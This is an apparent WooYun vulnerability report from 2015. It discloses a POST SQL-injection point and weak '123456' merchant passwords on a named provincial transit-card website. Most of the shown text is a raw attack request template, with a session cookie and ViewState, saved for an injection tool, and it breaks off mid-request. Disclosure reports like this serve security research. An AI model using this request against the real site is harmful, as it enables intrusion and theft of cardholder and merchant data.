当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101551

漏洞标题:某省一卡通漏洞泄露大量敏感信息(多家VIP商户弱口令)

相关厂商:某省一卡通

漏洞作者: 路人甲

提交时间:2015-03-16 07:55

修复时间:2015-04-30 07:55

公开时间:2015-04-30 07:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
1970-01-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
大部分做了脚本过滤,但是还是存在一处POST型SQL注入漏洞,应该是没防护POST注入造成
看到万达的影子,123456弱口令

详细说明:

河北一卡通:http://www.966009.com
一处POST型SQL注入漏洞,在充值缴费网点列表的查询处,这个页面没有被防SQL注入脚本过滤
http://www.966009.com/CLIENT/newsshow/jiaofeiwangdian.aspx?city=1

漏洞证明:

POST型注入,且该页面没有被防SQL注入脚本过滤
将下面保存到1.txt即可注入

POST /CLIENT/newsshow/jiaofeiwangdian.aspx?city=1 HTTP/1.1
Host: www.966009.com
Proxy-Connection: keep-alive
Content-Length: 17371
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.966009.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.966009.com/CLIENT/newsshow/jiaofeiwangdian.aspx?city=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=yl55zvx12g4gazs3t3zt4ekj; city=1; CNZZDATA1000205784=1646447420-1425875972-http%253A%252F%252Fwww.966009.com%252F%7C1425878616
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIwNTc3NzgyNDgPZBYCZg9kFgICAw9kFgYCAQ9kFgICAQ8WAh4JaW5uZXJodG1sBQtb55%2Bz5a625bqEXWQCAw9kFggCAQ8WAh4EVGV4dAX8BTx0cj4gICAgPHRkIGhlaWdodD0iNTAiIGJnY29sb3I9IiNFRkVGRUYiPiAgICAgICAgPHRhYmxlIHdpZHRoPScyMTAnIGJvcmRlcj0nMCcgYWxpZ249J2NlbnRlcicgY2VsbHBhZGRpbmc9JzAnIGNlbGxzcGFjaW5nPScwJz4gICAgICAgICAgICA8dHI%2BICAgICAgICAgICAgICAgICA8dGQgaGVpZ2h0PSIzNiIgYWxpZ249ImNlbnRlciIgYmFja2dyb3VuZD0iLi4vY29tbW9uL21lbWJlci9hbm51LmpwZyI%2BICAgICAgIDxhICBocmVmPSdtb3JlaGVscC5hc3B4P2hlbHB0eXBlPTAxJyBjbGFzcz0nbGluayc%2B55So5Y2h55%2Bl6K%2BGPC9hPiAgICAgICAgICAgICAgICAgIDwvdGQ%2BICAgICAgICAgICAgICAgPC90cj4gICAgICAgICAgIDwvdGFibGU%2BICAgICAgIDwvdGQ%2BPC90cj48dHI%2BICAgIDx0ZCBoZWlnaHQ9IjUwIiBiZ2NvbG9yPSIjRUZFRkVGIj4gICAgICAgIDx0YWJsZSB3aWR0aD0nMjEwJyBib3JkZXI9JzAnIGFsaWduPSdjZW50ZXInIGNlbGxwYWRkaW5nPScwJyBjZWxsc3BhY2luZz0nMCc%2BICAgICAgICAgICAgPHRyPiAgICAgICAgICAgICAgICAgPHRkIGhlaWdodD0iMzYiIGFsaWduPSJjZW50ZXIiIGJhY2tncm91bmQ9Ii4uL2NvbW1vbi9tZW1iZXIvYW5udS5qcGciPiAgICAgICA8YSAgaHJlZj0nbW9yZWhlbHAuYXNweD9oZWxwdHlwZT0wMicgY2xhc3M9J2xpbmsnPuW4uOingemXrumimDwvYT4gICAgICAgICAgICAgICAgICA8L3RkPiAgICAgICAgICAgICAgIDwvdHI%2BICAgICAgICAgICA8L3RhYmxlPiAgICAgICA8L3RkPjwvdHI%2BZAIDD2QWAgIBDxYCHgtfIUl0ZW1Db3VudAIHFg5mD2QWAmYPFQIDMTk0DOaUv%2BW6nOaWh%2BS7tmQCAQ9kFgJmDxUCAzIzMgzlkIjkvZzkvJnkvLRkAgIPZBYCZg8VAgMxOTIM5YWs5Y%2B46LWE6LSoZAIDD2QWAmYPFQIDMjM2G%2BWmguS9lee9rui0reays%2BWMl%2BS4gOWNoemAmmQCBA9kFgJmDxUCAzIwMAzoh6rliqnnu4jnq69kAgUPZBYCZg8VAgMxOTAi5rKz5YyX5LiA5Y2h6YCa5Y2h5Y%2Bv5Lul5oyC5aSx5ZCXP2QCBg9kFgJmDxUCAzIwNgzlhbblroPlkIjkvZxkAhMPFgIfAQXsTDx0cj48dGQgaGVpZ2h0PSIzMCIgIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNEREREREUiIGNsYXNzPSJyZWQwMiI%2BJm5ic3A7Jm5ic3A7PC90ZD48dGQgIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNEREREREUiIGNsYXNzPSJyZWQwMiI%2B572R54K55Y%2B3PC90ZD48dGQgIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNEREREREUiIGNsYXNzPSJyZWQwMiI%2B572R54K55ZCN56ewPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0RERERERSIgY2xhc3M9InJlZDAyIj7lnLDlnYA8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRERERERFIiBjbGFzcz0icmVkMDIiPuaJgOWcqOWMuuWfnzwvdGQ%2BPC90cj48dHI%2BPHRkICBoZWlnaHQ9IjMwIiBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj4wMjE1PC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTAyMTUnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOWwj%2BaYk%2BS%2Bv%2BWIqeW6lzwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILoo5XljY7kuJzot6%2FkuI7kuJzkuoznjq%2FkuqTlj6Popb%2FljJfop5LpvprlsJrlmInoi5HlsI%2FljLrlhoU8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7plb%2FlronljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMDIxNzwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0wMjE3JykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDljJflm73otoXluILplb%2FmsZ%2Flupc8L2E%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B55%2Bz5a625bqE5biC6KOV5Y2O5Lic6LevMTM45Y%2B377yI6ZW%2F5rGf5bqX5YaF77yJPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5byA5Y%2BR5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjAyMTg8L3RkPjx0ZCBhbGlnbj0ibGVmdCIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPGEgaHJlZj0iIyIgb25jbGljaz0idGFuY2h1KCdkb3RtYXAuYXNweD9kb3RfaWQ9MDIxOCcpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g6ZGr5Y2O5L6%2F5Yip5bqXPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4gue%2Fn%2BiQpeWNl%2BWkp%2Bihl%2BS4juWNl%2BS6jOeOr%2BS6pOWPo%2BWNl%2BihjDEwMDDnsbPot6%2Fopb%2FvvIjkuJzmlrnpmLPlhYnlm63vvIk8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7oo5XljY7ljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMDIyMDwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0wMjIwJykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDlm73lpKczNjUyNOWkp%2Be7j%2Bihl%2BW6lzwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILlpKfnu4%2FooZflkozkuJzpqazot6%2FkuqTlj6PkuJzljZfop5I8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7moaXkuJzljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMDIzNjwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0wMjM2JykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDlkIznpo%2FpgJrorq88L2E%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5qeQ5a6J6KW%2F6Lev6b6Z5bKX6KW%2F5Yy65bCP5Yy65Y2X6KGMMjAw57Gz6Lev5LicPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5qGl6KW%2F5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjA0NTwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0wNDUnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOWbvemZheWfjue7vOWQiOe8tOi0uTwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7osIjlm7rljZflpKfooZfkuI7mp5DljJfot6%2FkuqTlj4nlj6Pmp5DljJflhazlm63kuJzooYwyMDDnsbM8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7oo5XljY7ljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMDkwPC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTA5MCcpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g5Lic6L%2BQ55m%2B6LSn5ZWG5bqXPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuaWsOWNjuWMuuafj%2Bael%2BW6hOafj%2Bael%2Bi3rzkz5Y%2B3PC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5paw5Y2O5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjEzMTwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0xMzEnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOa0geiho%2BW5sua0lzwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7ljJfkuoznjq%2FkuJzkuoznjq%2FkuqTlj6PvvIzmsLTmnKjpnZLln47opb%2Fpl6jljJfooYw1MOexszwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPumVv%2BWuieWMujwvdGQ%2BPC90cj48dHI%2BPHRkICBoZWlnaHQ9IjMwIiBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj4yMjI8L3RkPjx0ZCBhbGlnbj0ibGVmdCIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPGEgaHJlZj0iIyIgb25jbGljaz0idGFuY2h1KCdkb3RtYXAuYXNweD9kb3RfaWQ9MjIyJykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDmmbrov5zkvr%2FliKnlupc8L2E%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B55%2Bz5a625bqE5biC6IGU6YKm5ZCN6YO95bCP5Yy65LiA5pyfPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5qGl6KW%2F5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjIyMzwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0yMjMnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOWdpOWdpOi2heW4gjwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILkuZ3kuK3ooZfkuI7lkozlubPot6%2FkuqTlj6PljJfooYwzMDDnsbPot6%2Fopb88L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7mlrDljY7ljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMjI1PC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTIyNScpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g5ZOB5ZGz5Lyg6K%2B05L6%2F5Yip5bqXPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4guWFieWNjui3r%2BS4juiDnOWIqeWMl%2Bihl%2BS6pOWPo%2BW%2BoeaZr%2BWbreWMl%2BmXqOWPozwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuahpeS4nOWMujwvdGQ%2BPC90cj48dHI%2BPHRkICBoZWlnaHQ9IjMwIiBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj4yMjY8L3RkPjx0ZCBhbGlnbj0ibGVmdCIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPGEgaHJlZj0iIyIgb25jbGljaz0idGFuY2h1KCdkb3RtYXAuYXNweD9kb3RfaWQ9MjI2JykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDljZrov5DotoXluIIgPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4guWFieWNjui3rznlj7fljZrpm4XluoTlm63pl6jlj6M8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7moaXkuJzljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMjI3PC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTIyNycpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g6b6Z5L2z54Of6YWS5ZWG6KGMPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4guW7uuWNjuWkp%2Bihl%2BS4juS4sOaUtui3r%2BS6pOWPo%2Baxh%2Bm%2Bmea5vuWwj%2BWMuumXqOWPo%2BWMl%2BS%2BpzwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuijleWNjuWMujwvdGQ%2BPC90cj48dHI%2BPHRkICBoZWlnaHQ9IjMwIiBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj4yMjg8L3RkPjx0ZCBhbGlnbj0ibGVmdCIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPGEgaHJlZj0iIyIgb25jbGljaz0idGFuY2h1KCdkb3RtYXAuYXNweD9kb3RfaWQ9MjI4JykiICBzdHlsZT0iY29sb3I6IzY2NiIgPiDliKnlrrbotoXluII8L2E%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B55%2Bz5a625bqE5biC5paw55%2Bz5YyX6LevMzgw5Y%2B35Y2T6L6%2B56eR6IuR6Zeo5Y%2BjPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5qGl6KW%2F5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjIzMDwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0yMzAnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOS4ieWFhOW8n%2BeZvui0p%2BWVhuW6lzwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILljZfpq5jln7rllYbotLjot688L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7mlrDljY7ljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMjMxPC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTIzMScpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g6JyA55KA5Lmm5bqXPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4guWfjuinkuihl%2BS4juaWsOefs%2BWMl%2Bi3r%2BS6pOWPo%2BWMl%2BihjDUw57Gz6Lev5LicPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5qGl6KW%2F5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjIzMjwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0yMzInKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOefs%2Bahpeadkee9keeCuTwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILnn7PojrfljZfot68yOTnlj7fvvIzmlrDljY7ot6%2FovabnrqHmiYDnn7PmoaXlsI%2FljLo8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7mlrDljY7ljLo8L3RkPjwvdHI%2BPHRyPjx0ZCAgaGVpZ2h0PSIzMCIgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2BMjMzPC90ZD48dGQgYWxpZ249ImxlZnQiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjxhIGhyZWY9IiMiIG9uY2xpY2s9InRhbmNodSgnZG90bWFwLmFzcHg%2FZG90X2lkPTIzMycpIiAgc3R5bGU9ImNvbG9yOiM2NjYiID4g6aOf5LmL6YGT57u85ZCI5ZWG5bqXPC9hPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPuefs%2BWutuW6hOW4guafj%2Bael%2BWMl%2BWMujE1LTItMTAx77yI5Lit5Y2O5YyX5aSn6KGX5p%2BP5p6X5YyX5Yy65biC56ys5LqM5bm85YS%2F5Zut5a%2B56Z2i77yJPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5paw5Y2O5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjIzNDwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0yMzQnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOWMl%2BmDoeWwj%2BWMuuaji%2BeJjOWupDwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILkuK3ljY7ljJflpKfooZfkuI7mlrDoi5Hot6%2FkuqTlj4nlj6Popb%2FooYwyMDDnsbPot6%2FljJco5YyX6YOh5bCP5Yy6QeWMujktMS0xMDHlrqQpPC90ZD48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VGRUZFRiIgY2xhc3M9ImZvbnQwMSI%2B5paw5Y2O5Yy6PC90ZD48L3RyPjx0cj48dGQgIGhlaWdodD0iMzAiIGFsaWduPSJjZW50ZXIiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZX